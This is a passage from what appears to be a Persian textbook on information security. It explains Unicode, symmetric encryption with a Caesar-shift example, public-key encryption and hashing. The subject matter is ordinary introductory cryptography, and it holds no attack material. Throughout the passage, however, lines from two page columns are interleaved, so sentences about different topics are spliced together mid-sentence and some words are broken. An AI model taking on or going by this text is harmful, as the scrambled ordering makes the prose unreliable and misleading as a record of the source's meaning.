‫‪ ASCII‬ﺩﺭ ﺁﻳﺪ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻣﺸﺎﺑﻪ ﻫﻤﺎﻥ ﻓﺮﺁﻳﻨـﺪﻱ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻛﻪ ﻃﻲ ﺁﻥ ﺗﻮﺍﻧـﺴﺘﻴﻢ ﺁﻥ ﺟﻤﻠـﻪ ﺭﺍ ﺗﻨﻬـﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻋـﺪﺍﺩ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﻛﺪﮔ ـﺬﺍﺭﻱ ﻛﻨــﻴﻢ‪ .‬ﻣــﺸﺎﺑﻪ ﻣﺜــﺎﻝ ﻗﺒﻠــﻲ‪ ،‬ﺩﺭ ﺍﻳﻨﺠــﺎ ﻧﻴــﺰ ﭘﻴــﺎﻡ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻤﺎﻧﻨﺪ ﻛﺪﮔﺬﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺁﻥ‪ ،‬ﻣﺘـﻮﻥ ﻳـﺎ‬ ‫ﻛﺪﮔﺬﺍﺭﻱﺷﺪﻩ ﺍﺯ ﺍﺻﻞ ﭘﻴﺎﻡ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺳﺖ؛ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﺑﻪ ﻗﺎﻟﺐ ﺩﻳﮕﺮﻱ ﺗﺒـﺪﻳﻞ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﻫـﺪﻑ ﺍﻳﻨﻜـﺎﺭ‬ ‫ﺍﻳﺠﺎﺩ ﺍﺷﻜﺎﻝ ﺧﺎﺻﻲ ﺍﻧﺘﻘـﺎﻝ ﻳﺎﺑـﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺩﺭﻳﺎﻓـﺖ ﺷـﺪ‬
‫ﻣﺨﻔﻲ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺍﺳﺖ‪.‬‬ ‫ﻛﺪﮔﺸﺎﻳﻲ ﮔﺮﺩﺩ ﻭ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﺁﻳﺪ‪.‬‬
‫ﺳﻪ ﺭﻭﺵ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫‪Unicode‬‬
‫‪١٣٨‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ‬ ‫•‬ ‫‪ Unicode‬ﻧﻮﻋﻲ ﺭﻭﺵ ﻛﺪﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺣﺮﻭﻓﻲ ﺍﺳـﺖ‬
‫‪١٣٩‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‬ ‫•‬ ‫ﻛﻪ ﺩﺭ ﺯﺑﺎﻧﻬﺎﻱ ﺭﺍﻳﺞ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻭ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‬
‫‪١٤٠‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﻄﺮﻓﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪Hash‬‬ ‫•‬ ‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻳﻜﺴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻧﺪ‪ .‬ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﻛـﻪ ﺩﺭ‬
‫ﻛﻨـــﺴﺮﺳﻴﻮﻡ ‪ (http://www.unicode.org) Unicode‬ﻣـــﻮﺭﺩ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ‬
‫ﺗﻮﺍﻓﻖ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺑﻪ ﺷﻜﻞ ﺧﻼﺻﻪ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺑﻪ ﺯﺑﺎﻥ ﺳﺎﺩﻩ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻣﺸﺎﺑﻪ ﻛﺪﮔـﺬﺍﺭﻱ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺍﺳﺎﺳﹰﺎ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎ ﺍﻋﺪﺍﺩ ﻭ ﺍﺭﻗﺎﻡ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ‬
‫ﺣﺮﻭﻑ ﺍﺻﻠﻲ ﻣﺘﻦ ﻫﻤﮕﻲ ﺩﺭ ﺁﻥ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ ﻣﻲﻳﺎﺑﻨﺪ‪ .‬ﻳﻜـﻲ‬
‫ﻭ ﺩﻳﮕﺮ ﻋﻼﻣﺘﻬﺎ ﺭﺍ ﺑﺎ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻥ ﻳﻚ ﻋـﺪﺩ ﺑـﻪ ﻫﺮﻳـﻚ ﺍﺯ‬
‫ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫـﺮ ﺣـﺮﻑ‬
‫ﺁﻧﻬﺎ ﺫﺧﻴـﺮﻩ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﭘـﻴﺶ ﺍﺯ ﭘﻴـﺪﺍﻳﺶ ‪ Unicode‬ﺻـﺪﻫﺎ‬
‫ﺭﺍ ﺑﺎ ﺣﺮﻑ ﺑﻌﺪﻱ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﻴﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ‪:‬‬
‫ﺳﻴﺴﺘﻢ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﺍﻳﻦ ﺗﺒﺪﻳﻼﺕ ﻭﺟﻮﺩ ﺩﺍﺷﺖ‪ ،‬ﺍﻣﺎ‬
‫‪ B‬ﺑﺠﺎﻱ ‪ A‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬ ‫ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺣﺮﻭﻑ ﻭ ﻋﻼﺕ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫‪ C‬ﺑﺠﺎﻱ ‪ B‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬ ‫ﻼ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎﻳﻲ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻧﻴﺎﺯ ﺑـﻪ ﭼﻨـﺪﻳﻦ‬ ‫ﻧﻤﻲﻛﺮﺩﻧﺪ؛ ﻭ ﻣﺜ ﹰ‬
‫‪ D‬ﺑﺠﺎﻱ ‪ C‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬ ‫ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺩﺍﺷﺖ ﺗﺎ ﺗﻤﺎﻣﻲ ﺯﺑﺎﻧﻬﺎﻱ ﺍﺭﻭﭘﺎﻳﻲ ﺭﺍ ﭘﻮﺷـﺶ‬
‫‪........‬‬ ‫ﺩﻫﺪ‪ .‬ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺯﺑﺎﻥ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻣﺎﻧﻨـﺪ ﺍﻧﮕﻠﻴـﺴﻲ‬
‫‪ Y‬ﺑﺠﺎﻱ ‪ X‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬ ‫ﻧﻴــﺰ ﻳــﻚ ﻛﺪﮔــﺬﺍﺭﻱ ﻭﺍﺣــﺪ ﺑــﺮﺍﻱ ﺗﻤــﺎﻣﻲ ﺣــﺮﻭﻑ‪ ،‬ﻋﻼﺋــﻢ ﻭ‬
‫‪ Z‬ﺑﺠﺎﻱ ‪ Y‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛‬ ‫ﻋﻼﻣﺘﻬﺎﻱ ﺩﺳﺘﻮﺭﻱ ﻭ ﻓﻨﻲ ﻛﺎﻓﻲ ﻧﺒﻮﺩ‪.‬‬
‫‪ A‬ﺑﺠﺎﻱ ‪ Z‬ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ )ﺩﺭ ﭘﺎﻳﺎﻥ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ‪ ،‬ﺩﻭﺑﺎﺭﻩ ﺑﻪ ﺣـﺮﻑ ﺍﻭﻝ‬
‫ﻫﻤﭽﻨﻴﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺑﺎ ﻳﻜـﺪﻳﮕﺮ ﻧﺎﺳـﺎﺯﮔﺎﺭ‬
‫ﺑﺎﺯﮔﺸﺘﻪﺍﻳﻢ(‪.‬‬
‫ﺑﻮﺩﻧﺪ‪ ،‬ﻳﻌﻨﻲ ﻣﻤﻜﻦ ﺑﻮﺩ ﺩﻭ ﺳﻴﺴﺘﻢ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﺍﻋـﺪﺍﺩ‬
‫ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﻴﻢ‪ ،‬ﻣﺜـﺎﻝ ﺫﻛـﺮ ﺷـﺪﻩ ﺗﺒـﺪﻳﻞ‬ ‫ﻣﺸﺎﺑﻬﻲ ﺑﺮﺍﻱ ﺩﻭ ﺣﺮﻑ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﻭ ﻳﺎ ﺑـﺮﺍﻱ ﻳـﻚ‬
‫ﻣﻲﺷﻮﺩ ﺑﻪ )ﻓﺎﺻﻠﻪ ﻭ ﻧﻘﻄﻪ ﺭﺍ ﺩﺭﻧﻈﺮ ﻧﮕﻴﺮﻳﺪ(‪:‬‬ ‫ﺣﺮﻑ‪ ،‬ﺩﻭ ﻋﺪﺩ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩﻩ ﺑﺎﺷـﻨﺪ‪ .‬ﻫـﺮ ﺭﺍﻳﺎﻧـﻪ )ﺑـﻮﻳﮋﻩ‬

‫‪TFDVSJUZ JT JNQPSUBOU.‬‬ ‫ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎ( ﺑﺎﻳــﺪ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔــﺬﺍﺭﻱ ﻣﺨﺘﻠﻔــﻲ‬


‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ‪ .‬ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺩﺍﺩﻩ ﻣﻴﺎﻥ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﺪﮔـﺬﺍﺭﻱ‬
‫ﻣﺨﺘﻠﻒ ﺗﺒﺎﺩﻝ ﻣﻲﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺳـﻴﺐ ﺑﺒﻴﻨـﺪ‪Unicode .‬‬
‫ﺁﻣﺪﻩ ﺑﻮﺩ ﺗﺎ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﺭﺍ ﺣﻞ ﻛﻨﺪ‪.‬‬
‫‪138 Symmetric Encryption‬‬
‫‪139 Public Key Encryption‬‬
‫‪140 One-way Hash Encryption‬‬ ‫‪137 Attachments‬‬
‫‪١٠٧‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺑﺎﺷﻨﺪ(‪ .‬ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺩﺭﺻﻮﺭﺗﻲ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﺍﻛﻨــﻮﻥ ﺍﻳــﻦ ﭘﻴــﺎﻡ ﺗﻐﻴﻴــﺮ ﻛــﺮﺩﻩ ﺍﺳــﺖ‪ .‬ﺩﺭﻳﺎﻓــﺖﻛﻨﻨــﺪﻩ ﺁﻧــﺮﺍ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺍﺯ ﺟﺎﻳﻲ ﺑﻪ ﺟﺎﻱ ﺩﻳﮕﺮ ﺍﻧﺘﻘﺎﻝ‬ ‫ﺑﺮﻣﻲﮔﺮﺩﺍﻧﺪ ﻭ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﺑﺎ ﺣﺮﻑ ﻗﺒﻠﻲ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲﻛﻨﺪ‬
‫ﻼ ﺍﻧﺘﻘﺎﻝ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺑـﻲﺳـﻴﻢ؛ ﻭ ﻳـﺎ ﺍﻳﻨﻜـﻪ‬ ‫ﺩﻫﻴﺪ‪ ،‬ﻣﺜ ﹰ‬ ‫ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺟﻤﻠﺔ ﺍﺻﻠﻲ ﺑﺪﺳﺖ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﺑﺨﻮﺍﻫﻴــﺪ ﺍﻃﻼﻋــﺎﺕ ﻣﻮﺟــﻮﺩ ﺭﻭﻱ ﻳــﻚ ﺩﻳــﺴﻚ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ‬ ‫ﺑﺠﺎﻱ ﺁﻧﻜﻪ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﻳﻚ ﻭﺍﺣﺪ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴﻢ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﻢ ﺁﻧﻬﺎ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺍﺭﺩ ﺍﺧﻴﺮ‬ ‫ﺭﺍ ﭼﻨﺪ ﻭﺍﺣﺪ ﻣﻨﺘﻘﻞ ﻛﻨﻴﻢ‪ .‬ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﻣﻘـﺪﺍﺭ ﺍﻳـﻦ‬
‫ﺍﮔﺮ ﻛﻠﻴﺪ ﻣﻔﻘﻮﺩ ﺷـﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﻧﻴـﺰ ﻣﻄﻤﺌﻨـﹰﺎ ﺍﺯ ﺩﺳـﺖ‬ ‫ﺍﻧﺘﻘﺎﻝ ﺭﺍ ﺑﺪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺭﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﺗﻌﺪﺍﺩ ﺗﻐﻴﻴﺮ ﻣﻜﺎﻥ ﻳﻚ ﺣﺮﻑ ﺭﺍ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ١٤١‬ﻣـﻲﮔﻮﻳﻨـﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‬ ‫ﺍﺯ ﺍﻳﻦ ﻋﺪﺩ ﻫﻢ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﻭ ﻫـﻢ‬
‫ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ‪ .‬ﺟﻮﻟﻴﻮﺱ ﺳﺰﺍﺭ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺭﺳـﺎﻝ‬
‫ﺍﻳﻦ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺸﺎﺑﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﺎ ﻳـﻚ‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺳـﺮﻱ ﺧـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤـﻮﺩ )ﺍﻭ ﻛﻠﻴـﺪ‬
‫ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ‪ :‬ﺑﺠﺎﻱ ﻳـﻚ ﻛﻠﻴـﺪ‪ ،‬ﺩﺭ ﺁﻥ ﺩﻭ ﻛﻠﻴـﺪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﺑﺮ ﻋﺪﺩ ‪ ۳‬ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩ ﺑﻮﺩ(‪.‬‬
‫ﺩﺭﻭﺍﻗﻊ ﺩﺭ ﺍﻳﻨﺠﺎ ﻛﻠﻴﺪﻱ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﮔﺮﺩﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻛﻠﻴﺪﻱ ﺍﺳﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﭘﻴـﺎ ﹺﻡ‬ ‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺳﺎﺩﻩ ﺍﮔﺮ ﭘﻴﺎﻡ ﺷﻤﺎ ﺩﺯﺩﻳـﺪﻩ ﺷـﻮﺩ ﻭ‬
‫ﻻ ﻛﻠﻴﺪ ﺍﻭﻝ ﻋﻤﻮﻣﻲ ﺍﺳـﺖ ﻭ‬ ‫ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬ ‫ﺳﺎﺭﻕ ﻣﺘﻮﺟﻪ ﺭﻭﺡ ﻛﻠﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺸﻮﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺣﺪﺱ‬
‫ﻫﻤﻪ ﻣﺠﺎﺯﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ‬ ‫ﺯﺩﻥ ﺑﺘﻮﺍﻧــﺪ ﻣﺤﺘــﻮﺍﻱ ﺁﻧــﺮﺍ ﺑﻔﻬﻤــﺪ‪ .‬ﺩﺭﺻــﻮﺭﺗﻴﻜﻪ ﺍﻟﮕــﻮﺭﻳﺘﻢ‬
‫ﺷﺨﺼﻲ ﻳﻚ ﭘﻴﺎﻡ ﺧﺼﻮﺻﻲ ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ‬ ‫ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷﺪ ﻛﻪ ﺑﺎ ﺍﻋﻤﺎﻝ ﭼﻨﺪ ﺟﺎﺑﺠﺎﻳﻲ ﺑﺘﻮﺍﻥ ﺁﻧﺮﺍ ﭘﻴﺪﺍ‬
‫ﻭﻱ ‪ -‬ﻛﻪ ﺧﻮﺩ ﺍﻭ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻫﻤﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ‬ ‫ﻛﺮﺩ ﺁﻧﮕﺎﻩ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﺴﻴﺎﺭ ﻣﺸﻜﻠﺘﺮ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺗﺎ ﻣﺪﺗﻲ ﭘﻴﺶ‬
‫‪ -‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ‬ ‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻌـﺪﺩﻱ ﺍﺯ ﺍﻳـﻦ ﺭﻭﺵ ﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ‬
‫ﻭﻱ ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺖ ﻭ ﺍﻳـﻦ ﻛﻠﻴـﺪ ﺭﺍ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ‪.‬‬
‫ﻧﺒﺎﻳﺪ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﺗﻮﺿﻴﺤﺎﺕ‬ ‫ﺍﻣﺮﻭﺯﻩ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﺠـﺎﻱ ﺍﻧﺘﻘـﺎﻝ ﺣـﺮﻭﻑ ﺍﺯ ﻓﺮﻣﻮﻟﻬـﺎﻱ‬
‫ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﭘﻴﺎﻡ ﺷﻤﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ‬ ‫ﺭﻳﺎﺿﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻟﺒﺘـﻪ ﻫﻨـﻮﺯ ﻫـﻢ ﺍﺯ ﻛﻠﻴـﺪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺑﺮﺍﻱ ﻛﺴﻲ ﺍﺭﺳﺎﻝ ﺷﻮﺩ‪ ،‬ﻫﻴﭻ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ ﺑﺠـﺰ ﮔﻴﺮﻧـﺪﺓ‬ ‫ﻣــﻲﻛﻨــﻴﻢ ﻭ ﺍﻳــﻦ ﻛﻠﻴــﺪ ﺑﺨــﺸﻲ ﺍﺯ ﺁﻥ ﻓﺮﻣــﻮﻝ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ‬
‫ﺣﻘﻴﻘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﺪ‪.‬‬ ‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﭘﻴﺎﻣﻲ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ﺣﺘﻤـﹰﺎ‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ‪ ،‬ﺷﺨﺺ ﻣﻄﻤﺌﻦ‬ ‫ﺑﺎﻳﺪ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻛﻠﻴـﺪ ﻣﺨـﺼﻮﺹ ﺭﺍ‬
‫ﻧﻴﺴﺖ ﭼﻪ ﻛﺴﻲ ﭘﻴﺎﻡ ﺭﺍ ﺑﺮﺍﻱ ﻭﻱ ﺍﺭﺳﺎﻝ ﻛﺮﺩﻩﺍﺳﺖ؛ ﺯﻳـﺮﺍ ﻫـﺮ‬ ‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﻠﻴﺪﻫﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﺍﻣﺘﺤﺎﻥ ﻛﻨﻴﺪ ﺗـﺎ ﺑـﻪ‬
‫ﻛﺴﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ﻭﻱ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﺍﻣـﺎ‬ ‫ﺟﻮﺍﺏ ﺑﺮﺳﻴﺪ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻛﻠﻴﺪ ﻣﺤﺪﻭﺩ ﺑﻪ ﺷﻤﺎﺭﻩﻫﺎﻱ ‪ ۱‬ﺗﺎ ‪۱۰‬‬
‫ﻓﺮﺳﺘﻨﺪﻩ ﻣﻄﻤﺌﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺗﻨﻬﺎ ﺻﺎﺣﺐ ﺁﻥ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ‬ ‫ﻼ‬‫ﺑﺎﺷﺪ‪ ،‬ﻋﻤﻠﻴﺎﺕ ﺣﺪﺱ ﺯﺩﻥ ﺯﻳﺎﺩ ﻃﻮﻝ ﻧﻤﻲﻛﺸﺪ‪ .‬ﺍﻣـﺎ ﺍﮔـﺮ ﻣـﺜ ﹰ‬
‫)ﻛﻠﻴﺪﻱ ﻛﻪ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻜﺎﺭ ﺭﻓﺘﻪ( ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ‬ ‫ﻣﻴﺎﻥ ﺍﻋﺪﺍﺩ ‪ ۱‬ﺗﺎ ‪ ۱۰۰‬ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻛﻤـﻲ ﺑﻴـﺸﺘﺮ ﺯﻣـﺎﻥ‬
